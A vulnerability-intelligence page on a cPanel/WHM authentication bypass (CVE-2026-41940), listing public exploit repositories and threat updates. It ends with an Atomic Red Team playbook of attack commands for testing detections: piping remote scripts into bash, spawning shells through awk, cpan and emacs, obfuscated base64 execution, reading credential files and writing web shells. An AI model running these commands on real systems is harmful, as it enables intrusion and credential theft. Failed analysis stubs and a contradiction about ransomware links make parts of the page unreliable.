CVE-2026-41940

CRITICAL CISA KEV EXPLOIT POC TTE Zero-Day Pub 29/04 Upd 06/05

Overview

This vulnerability is an authentication bypass affecting the login flow of cPanel and WHM versions later than 11.40. The root cause lies in improper validation within the authentication mechanism that allows unauthenticated requests to circumvent normal login procedures. The affected component is the control panel's authentication module responsible for user session establishment and access control.

Vulnerability Description

cPanel and WHM versions after 11.40 contain an authentication bypass vulnerability in the login flow that allows unauthenticated remote attackers to gain unauthorized access to the control panel.

Impact

An unauthenticated remote attacker can gain full unauthorized access to the cPanel and WHM control panel, allowing them to manage hosting configurations, access sensitive data, and execute administrative actions. No authentication or user interaction is required to exploit this vulnerability, enabling complete compromise of the affected system. This can lead to data breaches, service disruption, and further lateral movement within the hosting environment.

Solution

Apply the security update released by cPanel on April 28, 2026, which addresses this authentication bypass in cPanel and WHM versions after 11.40. Refer to the official vendor advisory at https://support.cpanel.net/hc/en-us/articles/40073787579671-cPanel-WHM-Security-Update-04-28-2026 for detailed patch instructions. Ensure all affected instances are updated to the fixed versions as specified in the advisory to mitigate this vulnerability.

EPSS vs KEV Prediction — Evolution (30 days)

Overview

Analysis generation failed

Threat Summary

Analysis generation failed

Full Analysis

The authentication bypass vulnerability present in cPanel and WHM versions after 11.40 is a critical security flaw that compromises the integrity of the login mechanism. This vulnerability allows unauthenticated remote attackers to bypass authentication controls, granting them unauthorized access to the control panel. The underlying issue stems from improper validation of user credentials during the login process, which can be exploited to gain administrative privileges without the need for valid login information. This flaw not only undermines the security of the affected systems but also exposes sensitive data and administrative functionalities to potential malicious actors.

Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit the flaw. By leveraging automated scripts or manual techniques, an attacker can manipulate the login flow to gain access to the control panel. Once inside, they can perform a range of malicious activities, including altering configurations, accessing sensitive information, or deploying additional malware. The exploitation can occur remotely, meaning that attackers do not need physical access to the affected systems, significantly increasing the risk of widespread attacks. Scenarios may include targeted attacks on web hosting providers or any organization utilizing cPanel and WHM for managing their web services, making it a prime target for cybercriminals.

The real-world impact of this vulnerability is substantial, particularly for businesses that rely on cPanel and WHM for their web hosting operations. Unauthorized access to the control panel can lead to data breaches, loss of customer trust, and potential legal ramifications due to non-compliance with data protection regulations. The financial implications can be severe, as organizations may face costs associated with incident response, remediation, and potential fines. Additionally, the reputational damage from such an incident can have long-lasting effects, as customers may seek alternative hosting solutions if they perceive a lack of security in their current provider.

To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating cPanel and WHM to the latest versions is crucial, as vendors often release patches to address known vulnerabilities. Additionally, employing intrusion detection systems (IDS) can help identify unauthorized access attempts and alert administrators to suspicious activities. Implementing strong authentication mechanisms, such as two-factor authentication (2FA), can further enhance security by adding an additional layer of verification for users attempting to access the control panel. Regular security audits and penetration testing can also help identify potential weaknesses in the system before they can be exploited.

In conclusion, the authentication bypass vulnerability in cPanel and WHM represents a significant threat to organizations utilizing these platforms for web hosting. The potential for unauthorized access to sensitive administrative functions poses a serious risk to data integrity and business operations. By understanding the technical details, attack vectors, and real-world implications of this vulnerability, organizations can take proactive measures to safeguard their systems. Implementing robust detection and mitigation strategies will not only protect against this specific vulnerability but also enhance overall security posture against future threats.




CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2026-41940, with a surge in both detection events and the availability of new exploitation tools. Notably, multiple public proof-of-concept exploits have emerged on GitHub, significantly lowering the barrier for threat actors to conduct unauthorized access against vulnerable cPanel and WHM instances. This development coincides with the vulnerability’s addition to the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring its recognition as an active and critical threat, particularly given documented ransomware group interest. Our telemetry indicates that the EPSS score for this vulnerability has risen sharply, reflecting a high likelihood of exploitation in the wild. The CVSS score adjustment to 9.8 further confirms the critical severity of this authentication bypass flaw. Collectively, these changes elevate the threat level substantially, signaling an urgent need for heightened vigilance as adversaries increasingly weaponize this vulnerability to gain privileged control over web hosting environments.



Update 2 — May 22, 2026

CSURFACE threat intelligence has identified a significant development in the exploitation landscape of CVE-2026-41940 with the emergence of a Metasploit module targeting this critical authentication bypass vulnerability. This addition substantially lowers the technical barrier for adversaries, enabling a broader range of threat actors—including less sophisticated attackers—to execute unauthorized access against vulnerable cPanel and WHM instances. Concurrently, our telemetry indicates a discernible uptick in detection activity, corroborating increased exploitation attempts in the wild. The EPSS score’s marked rise to 0.8437, now placing this vulnerability in the 0.99th percentile for exploitation likelihood, underscores the accelerating threat momentum. Given the known association of this vulnerability with ransomware campaigns, these shifts elevate the urgency and severity of the risk posture. Defenders must recognize that the availability of automated exploitation tools and growing exploitation activity significantly amplify the potential for widespread compromise, making CVE-2026-41940 an immediate and high-priority threat within hosting environments.



Update 3 — June 07, 2026

Since the last assessment, the threat landscape for CVE-2026-41940 has evolved with the publication of a new ExploitDB entry, marking the first formal public exploit record for this critical authentication bypass vulnerability. Although our telemetry indicates a significant reduction in detection activity, this decline may reflect a shift in attacker tactics rather than diminished exploitation attempts. Concurrently, the availability of new proof-of-concept exploits on public repositories has expanded, lowering the barrier for adversaries to weaponize this vulnerability. The EPSS score’s further increase to 0.9076, coupled with a steady upward trend, signals sustained and potentially growing exploitation risk. Given the known linkage of this vulnerability to ransomware campaigns, these developments underscore an elevated threat environment where automated and publicly accessible exploitation tools facilitate unauthorized access to cPanel and WHM control panels. Defenders should interpret this as a heightened risk scenario, where the combination of reduced detection signals and expanded exploit availability complicates timely identification and response, thereby increasing the likelihood of successful compromise.

Affected Products (3)

Vendor Product Version CPE
cpanel Cpanel Cpanel All cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:*
cpanel Cpanel Whm All cpe:2.3:a:cpanel:whm:*:*:*:*:*:*:*:*
cpanel Cpanel Wp Squared All cpe:2.3:a:cpanel:wp_squared:*:*:*:*:*:wordpress:*:*
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

Metasploit (1)

Module Authors Rank Platform Link
cPanel/WHM CRLF Injection Authentication Bypass RCE
exploits/multi/http/cpanel_whm_auth_bypass_rce
Sina Kheirkhah, Adam Kues, Shubham Shah +1 Unknown - View

ExploitDB (1)

Title Author Type Platform Date Link
cPanel - CRLF Injection nu11secur1ty webapps php - View

GitHub PoCs (77)

Repository Author Stars Forks Date Link
ynsmroztas/cPanelSniper
CVE-2026-41940 — cPanel & WHM Authentication Bypass via Session-File CRLF Injection
ynsmroztas 459 131 2026-05-01 View
olofsatte/CVE-2026-41940-PoC
CVE-2026-41940 is a critical authentication bypass vulnerability affecting cPanel and WHM. This repository is designed t...
olofsatte 202 51 2026-06-04 View
assetnote/cpanel2shell-scanner
High fidelity scanner for CVE-2026-41940 (cPanel & WHM authentication bypass)
assetnote 91 24 2026-04-30 View
XsanFlip/poc-cpanel-cve-2026-41940
XsanFlip 62 11 2026-05-01 View
clsmight/CVE-2026-41940-PoC
CVE-2026-41940 exploitation proof-of-concept project
clsmight 62 8 2026-06-16 View
adriyansyah-mf/cve-2026-41940-poc
adriyansyah-mf 28 15 2026-04-30 View
Sachinart/CVE-2026-41940-cpanel-0day
CVE-2026-41940 latest cPanel & WHM 0day - 70 million websites are possible to expose by Chirag Artani
Sachinart 26 2 2026-04-29 View
ilmndwntr/CVE-2026-41940-MASS-EXPLOIT
CVE-2026-41940 SUPPORT SINGLE & MASS SCAN EXPLOIT
ilmndwntr 13 9 2026-04-30 View
realawaisakbar/CVE-2026-41940-Exploit-PoC
This repository contains a Proof-of-Concept (PoC) exploit for CVE-2026-41940, a critical authentication bypass vulnerabi...
realawaisakbar 12 7 2026-04-30 View
Kagantua/cPanelWHM-AuthBypass
CVE-2026-41940
Kagantua 9 7 2026-04-30 View
bughunt4me/cpanelCVE-2026-41940
CVE-2026-41940 Auto Root Login
bughunt4me 12 4 2026-05-06 View
debugactiveprocess/cPanel-WHM-AuthBypass-Session-Checker
Post-Exploitation Session Validation Tool for CVE-2026-41940
debugactiveprocess 8 7 2026-04-29 View
rfxn/cpanel-sessionscribe
Detection, mitigation, and reverse-engineering tooling for CVE-2026-41940 (SessionScribe): the cPanel/WHM unauthenticate...
rfxn 13 1 2026-04-30 View
Christian93111/CVE-2026-41940
cPanel/WHM Authentication Bypass (Zero-Day Vulnerability)
Christian93111 9 2 2026-05-01 View
aquace/CVE-2026-41940-PoC
CVE-2026-41940 authentication bypass vulnerability proof-of-concept
aquace 7 2 2026-06-28 View
Jenderal92/CVE-2026-41940
Bulk scanner and mass exploitation tool for CVE-2026-41940 on cPanel/WHM, built for automated target validation and high...
Jenderal92 4 4 2026-05-01 View
senyx122/CVE-2026-41940
A security research tool for detecting and analyzing cPanel/WHM services and their authentication behavior. Designed for...
senyx122 7 0 2026-05-01 View
NULL200OK/cve-2026-41940-tool
A comprehensive Python utility to **detect**, **scan in bulk**, and **exploit** the critical authentication bypass vulne...
NULL200OK 4 2 2026-05-01 View
tc4dy/CVE-2026-41940-PoC-Exploit
🚀 CVE-2026-41940 cPanel/WHM Auth Bypass Exploit - Best Flow 💥 CRLF injection leads to auth bypass, session hijacking & a...
tc4dy 5 0 2026-05-12 View
shahidmallaofficial/cpanel-cve-2026-41940-fix
shahidmallaofficial 5 0 2026-04-30 View
habibkaratas/sorry-ransomware-analysis
Sorry ransomware (.sorry) IOCs, YARA rules and forensic analysis - CVE-2026-41940 cPanel campaign
habibkaratas 4 0 2026-05-04 View
Andrei-Dr/cpanel-cve-2026-41940-ioc
CVE-2026-41940 cPanel/WHM auth bypass IOC scanner — fixes false positives in upstream detection script, adds log cross-c...
Andrei-Dr 4 0 2026-04-30 View
Ishanoshada/CVE-2026-41940-Exploit-PoC
CVE-2026-41940 Exploit PoC – cPanel & WHM Authentication Bypass via CRLF Injection
Ishanoshada 2 1 2026-05-02 View
MrAriaNet/cPanel-Fix
One security-remediation.sh for CVE-2026-41940 (cPanel), CVE-2026-31431 (kernel "Copy Fail"), CSF, optional domain/proxy...
MrAriaNet 1 2 2026-05-01 View
AmirrezaMarzban/portscan-CVE-2026-41940
IP CIDRs (presumably as input, maybe command line or file) and checks ports 2083 and 2087 for openness
AmirrezaMarzban 1 2 2026-05-01 View
kmaruthisrikar/CVE-2026-41940-cPanel-Auth-Bypass-Exploit
kmaruthisrikar 2 1 2026-05-01 View
0xabdoulaye/CPANEL-CVE-2026-41940
0xabdoulaye 2 1 2026-04-30 View
mahfuzreham/cpanel-cve-2026-41940
cPanel CVE-2026-41940 nuclear.x86 Security Audit & Cleanup Script
mahfuzreham 2 1 2026-05-01 View
merdw/cPanel-CVE-2026-41940-Scanner
Advanced cPanel & WHM Security Scanner for CVE-2026-41940. with mass Shodan discovery
merdw 3 0 2026-05-01 View
yaunsky/cPanelWHM-AuthBypass
CVE-2026-41940
yaunsky 3 0 2026-04-30 View
willygailo/CVE-2026-41940-Linux
⚠️ DISCLAIMER: This tool is intended for authorized penetration testing and educational purposes only. Using this tool a...
willygailo 2 0 2026-05-27 View
44pie/cpsniper
cPanelSniper STABLE - CVE-2026-41940 optimized for 10M+ targets
44pie 2 0 2026-05-10 View
Defacto-ridgepole254/CVE-2026-41940-Exploit-PoC
Test authentication bypass vulnerabilities in cPanel and WHM using this proof of concept exploit tool written in Go.
Defacto-ridgepole254 1 1 2026-05-06 View
murrez/CVE-2026-41940
PoC for CVE-2026-41940: WHM/cPanel authentication bypass chain (Python 2.7). For authorized security research and testin...
murrez 1 1 2026-05-06 View
MrOplus/CVE-2026-41940
CVE-2026-41940 Direct Shell Acess
MrOplus 1 1 2026-05-02 View
Lutfifakee-Project/CVE-2026-41940
cPanel/WHM CVE-2026-41940 - Mass Scanner & Exploiter
Lutfifakee-Project 2 0 2026-05-01 View
Wesuiliye/CVE-2026-41940
CVE-2026-41940利用工具(go并发检测,python利用)
Wesuiliye 1 1 2026-04-30 View
Ap0dexMe0/CVE-2026-41940
cPanel & Whm Authentication Bypasser
Ap0dexMe0 2 0 2026-05-02 View
unteikyou/CVE-2026-41940-AuthBypass-Detector
Detection tool for cPanel/WHM CVE-2026-41940 (CRLF injection auth bypass). Verify vulnerability on servers you own or ha...
unteikyou 2 0 2026-05-01 View
george1-adel/CVE-2026-41940_exploit
george1-adel 2 0 2026-05-01 View
zedxod/CVE-2026-41940-POC
zedxod 2 0 2026-04-30 View
sardine-web/Automated-scanner-CVE-2026-41940
Automated scanner & post-exploitation toolkit for CVE-2026-41940 — cPanel & WHM root authentication bypass via session-f...
sardine-web 1 0 2026-05-24 View
Unleasheddotc/cve-2026-41940-exploit
improved poc of cve-2026-41940
Unleasheddotc 1 0 2026-05-01 View
tc4dy/CVE-2026-41940-POC-Exploit
🚀 CVE-2026-41940 cPanel/WHM Auth Bypass Exploit - Best Flow 💥 CRLF injection leads to auth bypass, session hijacking & a...
tc4dy 1 0 2026-05-12 View
thekawix/CVE-2026-41940
cve-2026-41940 cPanel/WHM Authentication Bypass - Detection Artifact Generator
thekawix 1 0 2026-05-07 View
Richflexpix/cpanel-pwn
cPanel/WHM CVE-2026-41940 CRLF injection auth bypass exploit
Richflexpix 0 1 2026-05-05 View
0xBlackash/CVE-2026-41940
CVE-2026-41940
0xBlackash 0 1 2026-05-01 View
Unfold-Security/CVE-2026-41940-Detection
Detection signatures for CVE-2026-41940 and shemas for cPanel logs
Unfold-Security 1 0 2026-05-05 View
nickpaulsec/2026-41940-poc
CVE-2026-41940: detect and exploit cpanel vuln
nickpaulsec 1 0 2026-05-04 View
cy3erm/CVE-2026-41940-POC
cPanel/WHM Authentication Bypass Proof of Concept — CVE-2026-41940
cy3erm 1 0 2026-05-03 View
linko-iheb/cve-2026-41940-scanner
linko-iheb 1 0 2026-05-02 View
0xF55/cve-2026-41940-exploit
improved poc of cve-2026-41940
0xF55 1 0 2026-05-01 View
0dev1337/cpanelscanner
Cpanel Scanner For CVE-2026-41940
0dev1337 1 0 2026-05-01 View
limo57640-crypto/cpanel-cve-41940-detector
Read-only cPanel CVE-2026-41940 IOC detector for .sorry ransomware, Mr_Rot13 Filemanager backdoors, C2 callbacks, cron, ...
limo57640-crypto 0 0 2026-05-16 View
asdasddqwdq29-a11y/CVE-2026-41940
Redacted cPanel/WHM authentication bypass analysis and authorized checker
asdasddqwdq29-a11y 0 0 2026-06-06 View
yurahshell/CVE-2026-41940
yurahshell 0 0 2026-06-05 View
zwanski2019/cPanelSniper
CVE-2026-41940 — cPanel & WHM Authentication Bypass via Session-File CRLF Injection
zwanski2019 0 0 2026-05-04 View
xxconi/CVE-2026-41940
Private exploit
xxconi 0 0 2026-05-23 View
zycoder0day/CVE-2026-41940
zycoder0day 0 0 2026-05-11 View
anach-ai/CVE-2026-41940
CVE-2026-41940 — cPanel/WHM Auth Bypass By Dr.Anach, CRLF injection in `cpsrvd` Basic auth handler → unauthenticated WHM...
anach-ai 0 0 2026-05-11 View
ngksiva/cpanel-forensics
Форензика после CVE-2026-41940 (cPanel/WHM) — bash-скрипт и чек-лист
ngksiva 0 0 2026-05-10 View
SreejaPuthan/cpanel-control-plane-exposure-check
Defensive exposure assessment tool for identifying externally accessible cPanel, WHM, and Webmail management interfaces ...
SreejaPuthan 0 0 2026-05-09 View
acuciureanu/cpanel2shell-honeypot
A Rust honeypot that simulates a vulnerable cPanel/WHM instance for CVE-2026-41940
acuciureanu 0 0 2026-05-08 View
branixsolutions/Security-CVE-2026-41940-cPanel-WHM-WP2
branixsolutions 0 0 2026-05-08 View
OhmGun/whmxploit---CVE-2026-41940
CVE-2026-41940
OhmGun 0 0 2026-05-06 View
itsismarcos/CVE-2026-41940
Exploit CVE-2026-41940 auto exploit
itsismarcos 0 0 2026-05-04 View
iSee857/cPanel-WHM-CVE-2026-41940-AuthBypass
cPanel-WHM-CVE-2026-41940-AuthBypass
iSee857 0 0 2026-05-04 View
sercanokur/CVE-2026-41940-cPanel-WHM-Verification-Tool
This repository contains a Python verification script for `CVE-2026-41940`, a critical authentication bypass vulnerabili...
sercanokur 0 0 2026-05-04 View
Underh0st/CPanel-Audit-Remediation-Tool
Audit and incident response tool for CVE-2026-41940 vulnerability
Underh0st 0 0 2026-05-03 View
tfawnies/CVE-2026-41940-next
tfawnies 0 0 2026-05-03 View
imbas007/POC_CVE-2026-41940
imbas007 0 0 2026-05-03 View
3tternp/CVE-2026-41940---cPanel-WHM-check
This is the office check script provided by cPanel for all the users who are using cPanel
3tternp 0 0 2026-05-02 View
dennisec/CVE-2026-41940
CVE-2026-41940
dennisec 0 0 2026-05-02 View
vineet7800/cpanel-malware-cleaner-cve-2026
cPanel malware, CVE-2026-41940, virus removal
vineet7800 0 0 2026-05-01 View
devtint/CVE-2026-41940
https://devtint.github.io/CVE-2026-41940
devtint 0 0 2026-05-01 View
rdyprtmx/poc-cve-2026-41940
rdyprtmx 0 0 2026-04-30 View
ZildanZ/CVE-2026-41940
ZildanZ 0 0 2026-05-05 View
Exploited in Wild CONFIRMED
Ransomware NOT ASSOCIATED
Attacker Interest MEDIUM
Sightings Few sightings

Threat Feed

34 events
2026-07-10
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-27
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-25
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-22
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-21
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-20
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-17
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-16
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-15
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-14
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-11
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-10
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-30
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2026-04-29
PoC Published (77 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

2026-04-28
Detected as Exploited in the Wild

Active exploitation confirmed — vendor: WebPros, product: cPanel & WHM and WP2 (WordPress Squared)

2026-04-28
Exploit Published (1 ExploitDB, 1 Metasploit)

Public exploit code is available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Authentication Bypass
100% auth_bypass
Insecure Direct Object Reference
94% idor
Authorization Bypass
93% authz_bypass
Privilege Escalation
35% privilege_escalation

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1505.003 Web Shell Kill Chain persistence Linux, macOS, Network Devices, Windows
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-166 Force the System to Reset Values
31%
Medium
CAPEC-12 Choosing Message Identifier
30%
High High
CAPEC-216 Communication Channel Manipulation
30%
CAPEC-36 Using Unpublished Interfaces or Functionality
30%
Medium High
CAPEC-62 Cross Site Request Forgery
30%
High Very High

Red Team Playbook

44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1505.003 Web Shell Written to Disk Windows CMD
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Command (CMD)
xcopy /I /Y "#{web_shells}" #{web_shell_path}
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
